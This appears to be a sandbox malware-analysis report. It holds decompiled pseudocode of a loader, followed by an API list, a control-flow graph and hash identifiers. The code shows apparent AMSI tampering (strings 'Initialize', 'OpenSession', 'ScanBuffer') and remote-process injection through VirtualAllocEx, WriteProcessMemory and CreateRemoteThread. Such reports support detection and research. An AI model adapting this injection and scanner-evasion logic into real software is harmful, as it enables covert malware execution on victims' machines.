					_pop(_t662); // executed
					E02183690(_v120, 0x2194598, _t662, 0x2194520); // executed
					if( *0x2194520 != 0) {
						_push(0x2188438);
						_push( *0x2194598);
						_push("Initialize");
						E02174C24();
						E02174A98( &_v128, E02174D64(_v132));
						_push(_v128);
						E02174BB0( &_v140,  *0x2194598, 0x2188438);
						E02174A98( &_v136, E02174D64(_v140));
						_pop(_t741); // executed
						E02183690(_v136, 0x2194598, _t741, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v144, E02174D64(_v148));
						_push(_v144);
						E02174BB0( &_v156,  *0x2194598, 0x2188438);
						E02174A98( &_v152, E02174D64(_v156));
						_pop(_t746); // executed
						E02183690(_v152, 0x2194598, _t746, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v160, E02174D64(_v164));
						_push(_v160);
						E02174BB0( &_v172,  *0x2194598, 0x2188438);
						E02174A98( &_v168, E02174D64(_v172));
						_pop(_t751); // executed
						E02183690(_v168, 0x2194598, _t751, 0x2194520); // executed
						E02174A98( &_v176, "kernel32");
						_t578 = E0217CAC8(_v176, 0x2194598, 0x8000); // executed
						 *0x21945ac = _t578;
						_t579 =  *0x21945ac; // 0x76670000
						 *0x21945a4 = GetProcAddress(_t579, "VirtualFree");
						_t581 =  *0x21945ac; // 0x76670000
						FreeLibrary(_t581);
						VirtualFree( *0x2194520, 0, 0x8000); // executed
						_t585 =  *0x219451c; // 0x4a7fda0
						_t92 = _t585 + 0x50; // 0x29000
						_t587 =  *0x219451c; // 0x4a7fda0
						_t93 = _t587 + 0x34; // 0x400000
						_t590 = VirtualAllocEx(_t756,  *_t93 +  *0x2194524,  *_t92, 0x3000, 0x40); // executed
						 *0x2194520 = _t590;
					}
				} while ( *0x2194520 == 0 &&  *0x2194524 <= 0x30000000);
				_push(0x2188438);
				_push( *0x2194598);
				_push(0x2188480);
				_push(0x218848c);
				_push(0x2188498);
				_push(0x21884a4);
				_push( *0x2194598);
				_push(0x21884b0);
				_push(0x21884bc);
				E02174C24();
				E02174A98( &_v180, E02174D64(_v184));
				_push(_v180);
				E02174BB0( &_v192,  *0x2194598, 0x2188438);
				E02174A98( &_v188, E02174D64(_v192));
				_pop(_t667); // executed
				E02183690(_v188, 0x2194598, _t667, 0x2194520); // executed
				_push(0x2188438);
				_push( *0x2194598);
				_push("ScanBuffer");
				E02174C24();
				E02174A98( &_v196, E02174D64(_v200));
				_push(_v196);
				E02174BB0( &_v208,  *0x2194598, 0x2188438);
				E02174A98( &_v204, E02174D64(_v208));
				_pop(_t672); // executed
				E02183690(_v204, 0x2194598, _t672, 0x2194520); // executed
				_push(0x2188438);
				_push( *0x2194598);
				_push(0x2188480);
				_push(0x218848c);
				_push(0x2188498);
				_push(0x21884a4);
				_push( *0x2194598);
				_push(0x21884b0);
				_push(0x21884bc);
				E02174C24();
				E02174A98( &_v212, E02174D64(_v216));
				_push(_v212);
				E02174BB0( &_v224,  *0x2194598, 0x2188438);
				E02174A98( &_v220, E02174D64(_v224));
				_pop(_t677); // executed
				E02183690(_v220, 0x2194598, _t677, 0x2194520); // executed
				_push( &_v244);
				E02186388(); // executed
				_t609 =  *0x2185930; // 0x2185934
				E021755FC(0x21944fc, _t609,  &_v244);
				if( *0x21944fc != 0) {
					_push(0x2188438);
					_push( *0x2194598);
					_push(0x2188480);
					_push(0x218848c);
					_push(0x2188498);
					_push(0x21884a4);
					_push( *0x2194598);
					_push(0x21884b0);
					_push(0x21884bc);
					E02174C24();
					E02174A98( &_v248, E02174D64(_v252));
					_push(_v248);
					E02174BB0( &_v260,  *0x2194598, 0x2188438);
					E02174A98( &_v256, E02174D64(_v260));
					_pop(_t688); // executed
					E02183690(_v256, 0x2194598, _t688, 0x2194520);
					_t387 =  *0x21944fc; // 0x10410000
					 *0x2194510 = _t387;
					_push(0x2188438);
					_push( *0x2194598);
					_push(0x2188480);
					_push(0x218848c);
					_push(0x2188498);
					_push(0x21884a4);
					_push( *0x2194598);
					_push(0x21884b0);
					_push(0x21884bc);
					E02174C24();
					E02174A98( &_v264, E02174D64(_v268));
					_push(_v264);
					E02174BB0( &_v276,  *0x2194598, 0x2188438);
					E02174A98( &_v272, E02174D64(_v276));
					_pop(_t693); // executed
					E02183690(_v272, 0x2194598, _t693, 0x2194520);
					_t402 =  *0x2194508; // 0x1042d450
					 *0x2194514 = _t402;
					_push(0x2188438);
					_push( *0x2194598);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v280, E02174D64(_v284));
					_push(_v280);
					E02174BB0( &_v292,  *0x2194598, 0x2188438);
					E02174A98( &_v288, E02174D64(_v292));
					_pop(_t698); // executed
					E02183690(_v288, 0x2194598, _t698, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v296, E02174D64(_v300));
					_push(_v296);
					E02174BB0( &_v308,  *0x2194598, 0x2188438);
					E02174A98( &_v304, E02174D64(_v308));
					_pop(_t703); // executed
					E02183690(_v304, 0x2194598, _t703, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v312, E02174D64(_v316));
					_push(_v312);
					E02174BB0( &_v324,  *0x2194598, 0x2188438);
					E02174A98( &_v320, E02174D64(_v324));
					_pop(_t708); // executed
					E02183690(_v320, 0x2194598, _t708, 0x2194520); // executed
					E02174A98( &_v328, "kernel32");
					_t448 = E0217CAC8(_v328, 0x2194598, 0x8000); // executed
					 *0x21945ac = _t448;
					_t449 =  *0x21945ac; // 0x76670000
					 *0x21945a8 = GetProcAddress(_t449, "WriteProcessMemory");
					_t451 =  *0x21945ac; // 0x76670000
					FreeLibrary(_t451);
					_t453 =  *0x2194500; // 0x29000
					_t454 =  *0x21944fc; // 0x10410000
					WriteProcessMemory(_t756,  *0x2194520, _t454, _t453, 0x2194518); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v332, E02174D64(_v336));
					_push(_v332);
					E02174BB0( &_v344,  *0x2194598, 0x2188438);
					E02174A98( &_v340, E02174D64(_v344));
					_pop(_t715); // executed
					E02183690(_v340, 0x2194598, _t715, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v348, E02174D64(_v352));
					_push(_v348);
					E02174BB0( &_v360,  *0x2194598, 0x2188438);
					E02174A98( &_v356, E02174D64(_v360));
					_pop(_t720); // executed
					E02183690(_v356, 0x2194598, _t720, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v364, E02174D64(_v368));
					_push(_v364);
					E02174BB0( &_v376,  *0x2194598, 0x2188438);
					E02174A98( &_v372, E02174D64(_v376));
					_pop(_t725); // executed
					E02183690(_v372, 0x2194598, _t725, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v380, E02174D64(_v384));
					_push(_v380);
					E02174BB0( &_v392,  *0x2194598, 0x2188438);
					E02174A98( &_v388, E02174D64(_v392));
					_pop(_t730); // executed
					E02183690(_v388, 0x2194598, _t730, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v396, E02174D64(_v400));
					_push(_v396);
					E02174BB0( &_v408,  *0x2194598, 0x2188438);
					E02174A98( &_v404, E02174D64(_v408));
					_pop(_t735); // executed
					E02183690(_v404, 0x2194598, _t735, 0x2194520); // executed
					E02185B0C(_t756, 0x2194510, E02187774, 0, 8);
					_t529 =  *0x2194518; // 0x71
					_t530 =  *0x2194500; // 0x29000
					NtProtectVirtualMemory(_t756,  *0x2194520, _t530, 1, _t529);
				}
				_pop(_t680);
				 *[fs:eax] = _t680;
				_push(E02188408);
				E021748C4( &_v408, 0x29);
				_t682 =  *0x2185930; // 0x2185934
				E02175398( &_v244, _t682);
				return E021748C4( &_v224, 0x35);
			}


























































































































































                                                                                                0x0218779c
                                                                                                0x0218779c
                                                                                                0x0218779c
                                                                                                0x0218779c
                                                                                                0x0218779d
                                                                                                0x021877a0
                                                                                                0x021877a5
                                                                                                0x021877a5
                                                                                                0x021877a7
                                                                                                0x021877a9
                                                                                                0x021877a9
                                                                                                0x021877ac
                                                                                                0x021877ac
                                                                                                0x021877af
                                                                                                0x021877b0
                                                                                                0x021877b1
                                                                                                0x021877b2
                                                                                                0x021877b5
                                                                                                0x021877c3
                                                                                                0x021877c4
                                                                                                0x021877c9
                                                                                                0x021877cc
                                                                                                0x021877d4
                                                                                                0x021877d9
                                                                                                0x021877da
                                                                                                0x021877e1
                                                                                                0x021877f8
                                                                                                0x021877e3
                                                                                                0x021877ea
                                                                                                0x021877ea
                                                                                                0x021877fd
                                                                                                0x02187802
                                                                                                0x02187804
                                                                                                0x02187811
                                                                                                0x02187823
                                                                                                0x0218782b
                                                                                                0x02187836
                                                                                                0x02187848
                                                                                                0x02187850
                                                                                                0x02187851
                                                                                                0x02187856
                                                                                                0x0218785b
                                                                                                0x0218785d
                                                                                                0x0218786a
                                                                                                0x0218787c
                                                                                                0x02187884
                                                                                                0x0218788f
                                                                                                0x021878a1
                                                                                                0x021878a9
                                                                                                0x021878aa
                                                                                                0x021878af
                                                                                                0x021878b4
                                                                                                0x021878b6
                                                                                                0x021878c3
                                                                                                0x021878d5
                                                                                                0x021878dd
                                                                                                0x021878e8
                                                                                                0x021878fa
                                                                                                0x02187902
                                                                                                0x02187903
                                                                                                0x02187908
                                                                                                0x02187911
                                                                                                0x02187912
                                                                                                0x02187919
                                                                                                0x0218791d
                                                                                                0x02187924
                                                                                                0x02187929
                                                                                                0x02187933
                                                                                                0x02187933
                                                                                                0x02187938
                                                                                                0x0218793a
                                                                                                0x0218793f
                                                                                                0x02187944
                                                                                                0x02187949
                                                                                                0x0218794e
                                                                                                0x02187950
                                                                                                0x02187955
                                                                                                0x02187962
                                                                                                0x02187974
                                                                                                0x0218797c
                                                                                                0x02187987
                                                                                                0x02187999
                                                                                                0x021879a1
                                                                                                0x021879a2
                                                                                                0x021879a7
                                                                                                0x021879ac
                                                                                                0x021879ae
                                                                                                0x021879bb
                                                                                                0x021879cd
                                                                                                0x021879d5
                                                                                                0x021879e0
                                                                                                0x021879f2
                                                                                                0x021879fa
                                                                                                0x021879fb
                                                                                                0x02187a00
                                                                                                0x02187a11
                                                                                                0x02187a16
                                                                                                0x02187a1a
                                                                                                0x02187a1f
                                                                                                0x02187a29
                                                                                                0x02187a2e
                                                                                                0x02187a30
                                                                                                0x02187a35
                                                                                                0x02187a37
                                                                                                0x02187a44
                                                                                                0x02187a56
                                                                                                0x02187a5e
                                                                                                0x02187a69
                                                                                                0x02187a7b
                                                                                                0x02187a83
                                                                                                0x02187a84
                                                                                                0x02187a89
                                                                                                0x02187a8e
                                                                                                0x02187a90
                                                                                                0x02187a9d
                                                                                                0x02187aaf
                                                                                                0x02187ab7
                                                                                                0x02187ac2
                                                                                                0x02187ad4
                                                                                                0x02187adc
                                                                                                0x02187add
                                                                                                0x02187ae5
                                                                                                0x02187aeb
                                                                                                0x02187af0
                                                                                                0x02187af2
                                                                                                0x02187aff
                                                                                                0x02187b11
                                                                                                0x02187b19
                                                                                                0x02187b27
                                                                                                0x02187b3f
                                                                                                0x02187b4a
                                                                                                0x02187b4b
                                                                                                0x02187b50
                                                                                                0x02187b55
                                                                                                0x02187b57
                                                                                                0x02187b67
                                                                                                0x02187b7f
                                                                                                0x02187b8a
                                                                                                0x02187b98
                                                                                                0x02187bb0
                                                                                                0x02187bbb
                                                                                                0x02187bbc
                                                                                                0x02187bc1
                                                                                                0x02187bc6
                                                                                                0x02187bc8
                                                                                                0x02187bd8
                                                                                                0x02187bf0
                                                                                                0x02187bfb
                                                                                                0x02187c09
                                                                                                0x02187c21
                                                                                                0x02187c2c
                                                                                                0x02187c2d
                                                                                                0x02187c3d
                                                                                                0x02187c4d
                                                                                                0x02187c52
                                                                                                0x02187c5c
                                                                                                0x02187c67
                                                                                                0x02187c6c
                                                                                                0x02187c72
                                                                                                0x02187c81
                                                                                                0x02187c8e
                                                                                                0x02187c93
                                                                                                0x02187c97
                                                                                                0x02187c9c
                                                                                                0x02187ca7
                                                                                                0x02187cac
                                                                                                0x02187cac
                                                                                                0x02187cae
                                                                                                0x02187cc3
                                                                                                0x02187cc8
                                                                                                0x02187cca
                                                                                                0x02187ccf
                                                                                                0x02187cd4
                                                                                                0x02187cd9
                                                                                                0x02187cde
                                                                                                0x02187ce0
                                                                                                0x02187ce5
                                                                                                0x02187cf5
                                                                                                0x02187d0d
                                                                                                0x02187d18
                                                                                                0x02187d26
                                                                                                0x02187d3e
                                                                                                0x02187d49
                                                                                                0x02187d4a
                                                                                                0x02187d4f
                                                                                                0x02187d54
                                                                                                0x02187d56
                                                                                                0x02187d66
                                                                                                0x02187d7e
                                                                                                0x02187d89
                                                                                                0x02187d97
                                                                                                0x02187daf
                                                                                                0x02187dba
                                                                                                0x02187dbb
                                                                                                0x02187dc0
                                                                                                0x02187dc5
                                                                                                0x02187dc7
                                                                                                0x02187dcc
                                                                                                0x02187dd1
                                                                                                0x02187dd6
                                                                                                0x02187ddb
                                                                                                0x02187ddd
                                                                                                0x02187de2
                                                                                                0x02187df2
                                                                                                0x02187e0a
                                                                                                0x02187e15
                                                                                                0x02187e23
                                                                                                0x02187e3b
                                                                                                0x02187e46
                                                                                                0x02187e47
                                                                                                0x02187e52
                                                                                                0x02187e5a
                                                                                                0x02187e6a
                                                                                                0x02187e70
                                                                                                0x02187e7c
                                                                                                0x02187e82
                                                                                                0x02187e87
                                                                                                0x02187e89
                                                                                                0x02187e8e
                                                                                                0x02187e93
                                                                                                0x02187e98
                                                                                                0x02187e9d
                                                                                                0x02187e9f
                                                                                                0x02187ea4
                                                                                                0x02187eb4
                                                                                                0x02187ecc
                                                                                                0x02187ed7
                                                                                                0x02187ee5
                                                                                                0x02187efd
                                                                                                0x02187f08
                                                                                                0x02187f09
                                                                                                0x02187f0e
                                                                                                0x02187f13
                                                                                                0x02187f18
                                                                                                0x02187f1d
                                                                                                0x02187f1f
                                                                                                0x02187f24
                                                                                                0x02187f29
                                                                                                0x02187f2e
                                                                                                0x02187f33
                                                                                                0x02187f35
                                                                                                0x02187f3a
                                                                                                0x02187f4a
                                                                                                0x02187f62
                                                                                                0x02187f6d
                                                                                                0x02187f7b
                                                                                                0x02187f93
                                                                                                0x02187f9e
                                                                                                0x02187f9f
                                                                                                0x02187fa4
                                                                                                0x02187fa9
                                                                                                0x02187fae
                                                                                                0x02187fb3
                                                                                                0x02187fb5
                                                                                                0x02187fc5
                                                                                                0x02187fdd
                                                                                                0x02187fe8
                                                                                                0x02187ff6
                                                                                                0x0218800e
                                                                                                0x02188019
                                                                                                0x0218801a
                                                                                                0x0218801f
                                                                                                0x02188024
                                                                                                0x02188026
                                                                                                0x02188036
                                                                                                0x0218804e
                                                                                                0x02188059
                                                                                                0x02188067
                                                                                                0x0218807f
                                                                                                0x0218808a
                                                                                                0x0218808b
                                                                                                0x02188090
                                                                                                0x02188095
                                                                                                0x02188097
                                                                                                0x021880a7
                                                                                                0x021880bf
                                                                                                0x021880ca
                                                                                                0x021880d8
                                                                                                0x021880f0
                                                                                                0x021880fb
                                                                                                0x021880fc
                                                                                                0x0218810c
                                                                                                0x0218811c
                                                                                                0x02188121
                                                                                                0x0218812b
                                                                                                0x02188136
                                                                                                0x0218813b
                                                                                                0x02188141
                                                                                                0x0218814b
                                                                                                0x02188151
                                                                                                0x0218815b
                                                                                                0x02188161
                                                                                                0x02188166
                                                                                                0x02188168
                                                                                                0x02188178
                                                                                                0x02188190
                                                                                                0x0218819b
                                                                                                0x021881a9
                                                                                                0x021881c1
                                                                                                0x021881cc
                                                                                                0x021881cd
                                                                                                0x021881d2
                                                                                                0x021881d7
                                                                                                0x021881d9
                                                                                                0x021881e9
                                                                                                0x02188201
                                                                                                0x0218820c
                                                                                                0x0218821a
                                                                                                0x02188232
                                                                                                0x0218823d
                                                                                                0x0218823e
                                                                                                0x02188243
                                                                                                0x02188248
                                                                                                0x0218824a
                                                                                                0x0218825a
                                                                                                0x02188272
                                                                                                0x0218827d
                                                                                                0x0218828b
                                                                                                0x021882a3
                                                                                                0x021882ae
                                                                                                0x021882af
                                                                                                0x021882b4
                                                                                                0x021882b9
                                                                                                0x021882bb
                                                                                                0x021882cb
                                                                                                0x021882e3
                                                                                                0x021882ee
                                                                                                0x021882fc
                                                                                                0x02188314
                                                                                                0x0218831f
                                                                                                0x02188320
                                                                                                0x02188325
                                                                                                0x0218832a
                                                                                                0x0218832c
                                                                                                0x0218833c
                                                                                                0x02188354
                                                                                                0x0218835f
                                                                                                0x0218836d
                                                                                                0x02188385
                                                                                                0x02188390
                                                                                                0x02188391
                                                                                                0x021883a6
                                                                                                0x021883ab
                                                                                                0x021883b3
                                                                                                0x021883bd
                                                                                                0x021883bd
                                                                                                0x021883c4
                                                                                                0x021883c7
                                                                                                0x021883ca
                                                                                                0x021883da
                                                                                                0x021883e5
                                                                                                0x021883eb
                                                                                                0x02188400

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,02188401,?,?,?,?,00000000,00000000), ref: 021877DA
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                • GetProcAddress.KERNEL32(76670000,VirtualFree), ref: 02187C62
                                                                                                • FreeLibrary.KERNEL32(76670000,76670000,VirtualFree,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598,02188438,ScanBuffer,02194598,02188438,UacScan), ref: 02187C72
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,76670000,76670000,VirtualFree,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598,02188438,ScanBuffer), ref: 02187C81
                                                                                                • VirtualAllocEx.KERNEL32(?,-01D94524,00029000,00003000,00000040), ref: 02187CA7
                                                                                                • VirtualAlloc.KERNEL32(-01D94524,00029000,00003000,00000040,ScanBuffer,02194598,02188438,021884BC,021884B0,02194598,021884A4,02188498,0218848C,02188480,02194598,02188438), ref: 02187A29
                                                                                                  • Part of subcall function 0217CAC8: SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                  • Part of subcall function 0217CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                • GetProcAddress.KERNEL32(76670000,WriteProcessMemory), ref: 02188131
                                                                                                • FreeLibrary.KERNEL32(76670000,76670000,WriteProcessMemory,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598,02188438,021884BC,021884B0,02194598,021884A4), ref: 02188141
                                                                                                • WriteProcessMemory.KERNEL32(?,10410000,10410000,00029000,02194518,76670000,76670000,WriteProcessMemory,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598), ref: 0218815B
                                                                                                  • Part of subcall function 02185B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                  • Part of subcall function 02185B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
                                                                                                  • Part of subcall function 02185B0C: ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                • NtProtectVirtualMemory.N(?,00029000,00029000,00000001,00000071,OpenSession,02194598,02188438,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598), ref: 021883BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryMemoryVirtual$Free$AddressProcProcess$AllocLoad$CreateCurrentErrorFlushHandleInetModeModuleMoveObjectOfflineProtectReadRemoteSingleThreadWaitWrite
                                                                                                • String ID: Initialize$OpenSession$ScanBuffer$UacScan$VirtualFree$WriteProcessMemory$kernel32$teSe
                                                                                                • API String ID: 1742017062-2541080484
                                                                                                • Opcode ID: 5ecfce32a4ae5496d76aab4fa2b39547e6ba6fbed24add456cf3ac03fffcab2e
                                                                                                • Instruction ID: 28bda7a8bdbbdd1295cc0c1097c59bb9659dbe885e03b34c71e8ff61c02af36a
                                                                                                • Opcode Fuzzy Hash: 5ecfce32a4ae5496d76aab4fa2b39547e6ba6fbed24add456cf3ac03fffcab2e
                                                                                                • Instruction Fuzzy Hash: 3462E035AC02189FEB21FB64DCC0FDEB3B6AF85700F5184A6A149AB214DB70AE45CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218773C Relevance: 32.3, APIs: 10, Strings: 8, Instructions: 769COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 4789 218773c-2187740 4790 2187742 4789->4790 4791 21877a7-21877aa 4789->4791 4790->4791 4792 21877ac-21877e1 call 217304c InetIsOffline 4791->4792 4793 21877a5 4791->4793 4796 21877f1-21877f3 4792->4796 4797 21877e3-21877ef call 21748f4 4792->4797 4793->4791 4799 21877fd-2187929 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4796->4799 4800 21877f8 call 21748f4 4796->4800 4797->4799 4844 2187933-2187ae5 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 VirtualAlloc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4799->4844 4800->4799 4901 2187aeb-2187cac call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 217cac8 GetProcAddress FreeLibrary VirtualFree VirtualAllocEx 4844->4901 4902 2187cae-2187cb1 4844->4902 4901->4902 4903 2187cc3-2187e7c call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2186388 call 21755fc 4902->4903 4904 2187cb3-2187cbd 4902->4904 4997 21883c2-2188400 call 21748c4 call 2175398 call 21748c4 4903->4997 4998 2187e82-21883bd call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 217cac8 GetProcAddress FreeLibrary WriteProcessMemory call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185b0c NtProtectVirtualMemory 4903->4998 4904->4844 4904->4903 4998->4997
                                                                                                C-Code - Quality: 43%
                                                                                                			E0218773C(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
				intOrPtr* _v0;
				char _v4;
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				char _v116;
				intOrPtr _v117;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				char _v240;
				char _v244;
				intOrPtr _v248;
				char _v252;
				char _v256;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				intOrPtr _v332;
				char _v336;
				char _v340;
				char _v344;
				intOrPtr _v348;
				char _v352;
				char _v356;
				char _v360;
				intOrPtr _v364;
				char _v368;
				char _v372;
				char _v376;
				intOrPtr _v380;
				char _v384;
				char _v388;
				char _v392;
				intOrPtr _v396;
				char _v400;
				char _v404;
				void* _t215;
				void* _t218;
				intOrPtr _t295;
				intOrPtr _t297;
				PVOID* _t300;
				void* _t396;
				intOrPtr _t411;
				struct HINSTANCE__* _t457;
				struct HINSTANCE__* _t458;
				struct HINSTANCE__* _t460;
				long _t462;
				void* _t463;
				long* _t538;
				long* _t539;
				struct HINSTANCE__* _t587;
				struct HINSTANCE__* _t588;
				struct HINSTANCE__* _t590;
				intOrPtr _t594;
				intOrPtr _t596;
				PVOID* _t599;
				intOrPtr* _t602;
				intOrPtr* _t603;
				intOrPtr* _t604;
				intOrPtr _t623;
				void* _t648;
				void* _t653;
				void* _t658;
				void* _t664;
				void* _t669;
				void* _t674;
				void* _t679;
				void* _t684;
				void* _t689;
				void* _t694;
				intOrPtr _t697;
				intOrPtr _t699;
				void* _t705;
				void* _t710;
				void* _t715;
				void* _t720;
				void* _t725;
				void* _t732;
				void* _t737;
				void* _t742;
				void* _t747;
				void* _t752;
				void* _t758;
				void* _t763;
				void* _t768;
				void* _t775;
				void* _t776;
				void* _t778;
				intOrPtr _t781;

				_t776 = __esi;
				_t774 = __edi;
				_t610 = __ecx;
				_t607 = __ebx;
				_t215 = __eax +  *__eax;
				 *_t215 = _t215 +  *_t215;
				if( *_t215 < 0) {
					while(1) {
						_push(0);
						_t610 = _t610 - 1;
						if(_t610 == 0) {
							break;
						}
						_push(0);
					}
					_t9 =  &_v4;
					 *_t9 = _t610;
					_push(_t776);
					_v4 =  *_t9;
					_t775 = _t215;
					_push(_t778);
					_push(0x2188401);
					_push( *[fs:eax]);
					 *[fs:eax] = _t781;
					_t218 = E0217304C(0x270e);
					_push(_t218);
					L021858FC();
					if(_t218 == 0) {
						E021748F4(0x2194598, 0x218842c);
					} else {
						E021748F4(0x2194598, 0x218841c);
					}
					_push(0x2188438);
					_push( *0x2194598);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v12, E02174D64(_v16));
					_push(_v12);
					E02174BB0( &_v24,  *0x2194598, 0x2188438);
					E02174A98( &_v20, E02174D64(_v24));
					_pop(_t648); // executed
					E02183690(_v20, 0x2194598, _t648, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v28, E02174D64(_v32));
					_push(_v28);
					E02174BB0( &_v40,  *0x2194598, 0x2188438);
